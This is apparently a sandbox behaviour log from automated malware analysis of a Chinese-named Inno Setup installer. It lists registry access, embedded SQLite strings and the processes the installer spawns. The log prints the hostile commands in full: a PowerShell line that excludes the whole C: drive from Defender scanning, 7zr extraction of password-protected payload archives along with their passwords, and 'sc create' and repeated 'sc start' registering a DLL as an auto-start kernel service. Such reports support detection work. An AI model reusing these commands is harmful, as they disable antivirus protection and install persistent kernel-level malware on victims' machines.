Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000001.00000003.1793672185.0000000004399000.00000004.00001000.00020000.00000000.sdmp, is-B21TE.tmp.6.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000001.00000003.1793672185.0000000004399000.00000004.00001000.00020000.00000000.sdmp, is-B21TE.tmp.6.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000001.00000003.1793672185.0000000004399000.00000004.00001000.00020000.00000000.sdmp, is-B21TE.tmp.6.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000001.00000003.1793672185.0000000004399000.00000004.00001000.00020000.00000000.sdmp, is-B21TE.tmp.6.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000001.00000003.1793672185.0000000004399000.00000004.00001000.00020000.00000000.sdmp, is-B21TE.tmp.6.drBinary or memory string: SELECT data FROM %Q.'%q_node' WHERE nodeno=?Node %lld missing from databaseNode %lld is too small (%d bytes)Rtree depth out of range (%d)Node %lld is too small for cell count of %d (%d bytes)Dimension %d of cell %d on node %lld is corruptDimension %d of cell %d on node %lld is corrupt relative to parentwrong number of arguments to function rtreecheck()SELECT * FROM %Q.'%q_rowid'Schema corrupt or not an rtree_rowid_parentENDSELECT count(*) FROM %Q.'%q_%s'cannot open value of type %sno such rowid: %lldforeign keyindexedcannot open virtual table: %scannot open table without rowid: %scannot open view: %sno such column: "%s"cannot open %s column for writingblockDELETE FROM %Q.'%q_data';DELETE FROM %Q.'%q_idx';DELETE FROM %Q.'%q_docsize';version%s_nodedata_shape does not contain a valid polygon
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000001.00000003.1793672185.0000000004399000.00000004.00001000.00020000.00000000.sdmp, is-B21TE.tmp.6.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000001.00000003.1793672185.0000000004399000.00000004.00001000.00020000.00000000.sdmp, is-B21TE.tmp.6.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000001.00000003.1793672185.0000000004399000.00000004.00001000.00020000.00000000.sdmp, is-B21TE.tmp.6.drBinary or memory string: SELECT %s WHERE rowid = ?SELECT rowid, rank FROM %Q.%Q ORDER BY %s("%w"%s%s) %sinvalid rootpageorphan indexsqlite_stat%dDELETE FROM %Q.%s WHERE %s=%QDELETE FROM %Q.sqlite_master WHERE name=%Q AND type='trigger'corrupt schemaUPDATE %Q.sqlite_master SET rootpage=%d WHERE #%d AND rootpage=#%dstattable %s may not be droppeduse DROP TABLE to delete table %suse DROP VIEW to delete view %stblDELETE FROM %Q.sqlite_sequence WHERE name=%QDELETE FROM %Q.sqlite_master WHERE tbl_name=%Q and type!='trigger' UNIQUEindexcannot create a TEMP index on non-TEMP table "%s"table %s may not be indexedviews may not be indexedvirtual tables may not be indexedthere is already a table named %sindex %s already existssqlite_autoindex_%s_%dexpressions prohibited in PRIMARY KEY and UNIQUE constraintsconflicting ON CONFLICT clauses specifiedCREATE%s INDEX %.*sINSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);name='%q' AND type='index'table "%s" has more than one primary keyAUTOINCREMENT is only allowed on an INTEGER PRIMARY KEYTABLEVIEW
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000001.00000003.1793672185.0000000004399000.00000004.00001000.00020000.00000000.sdmp, is-B21TE.tmp.6.drBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.exeString found in binary or memory: /LOADINF="filename"
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exeFile read: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe"
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exeProcess created: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp "C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp" /SL5="$20456,4753292,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe"
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe" /VERYSILENT
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exeProcess created: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp "C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp" /SL5="$40272,4753292,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe" /VERYSILENT
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exeProcess created: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp "C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp" /SL5="$20456,4753292,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exeProcess created: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp "C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp" /SL5="$40272,4753292,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9ialdJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoarJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= autoJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoarJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: rstrtmgr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpSection loaded: edputil.dllJump to behavior
